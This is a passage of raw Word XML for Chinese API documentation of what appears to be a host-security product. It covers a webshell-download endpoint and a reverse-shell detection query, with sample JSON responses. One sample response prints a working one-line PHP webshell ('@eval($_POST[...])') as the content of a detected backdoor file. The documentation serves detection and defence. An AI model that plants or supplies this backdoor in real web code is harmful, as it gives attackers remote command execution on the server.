        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "retcode": 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04386B0E"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="6614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="21472E9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36FA8CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DAB29C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A6E42FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="530C7DE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15EE0C67" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D3DDC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F00398" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C6B211" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA9F377" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-1:无任务0:未开始执行 1:排队执行 2:正在执行 3:执行成功 4:执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="685E7BAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="web后门-文件下载"/>
      <w:bookmarkEnd w:id="153"/>
      <w:r>
        <w:t>Web后门-文件下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBB4E6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web后门文件下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC7661" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816255A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/api/websecurity/webshell/{linux|win}/download/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3DDCB"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5645EA0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D805E09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60A435F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B73580" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D8C3124" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D216FDB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5330C27F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10A270CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42CE738A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053353C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26CCDC62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F5B71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/webshell/{linux|win}/download/5a790f0b7d761b6bc78e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD3CE99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9A789" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "fileName": "php.php",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "content": "\ufeff&lt;?php @eval($_POST['c']);?&gt;\n"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D1873"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082"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="30587CA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DEFB9E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30BBFA16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3675DAAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62534A5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31C679CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DB29BE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>fileName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5813140D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF52697" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD64FF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2027909D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263B2A07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C81ABF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05B6E0D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DB53B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28E3978D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="反弹shellwindowslinux"/>
      <w:bookmarkEnd w:id="150"/>
      <w:bookmarkEnd w:id="154"/>
      <w:r>
        <w:t>反弹shell(Windows&amp;Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39BEC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="查询结果-4"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857FDB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Windows和Linux反弹shell上报事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACCB70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A057ADA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>//windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>GET /external/api/detect/bounceshell/win</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/api/detect/bounceshell/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46DE13"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519"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6E86358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CC279CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC6E9AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38FEE9D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="265D90BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="434E0762" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DC0E6A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C5D16FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A47D9F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31812AA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23CAC33A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237E15B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3713E286" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10E60EBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64D03D41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F07DBE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B04F07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD499E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7921355D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A093A22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E46F672" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B8B230E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CC7B2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="069E0B79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782AD554" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5881A7AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="236941DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>targetIpLike</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18109BF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503B5287" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ED9E70D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目标主机(模糊查询)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="712A7956" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="010A7C68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>targetPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A534C1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389BE66E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE3CC89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="368038F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="057DC2B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A3C4AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BC93F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328514EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70161B0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18617F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/bounceshell/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160F937" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50456FAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签b"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
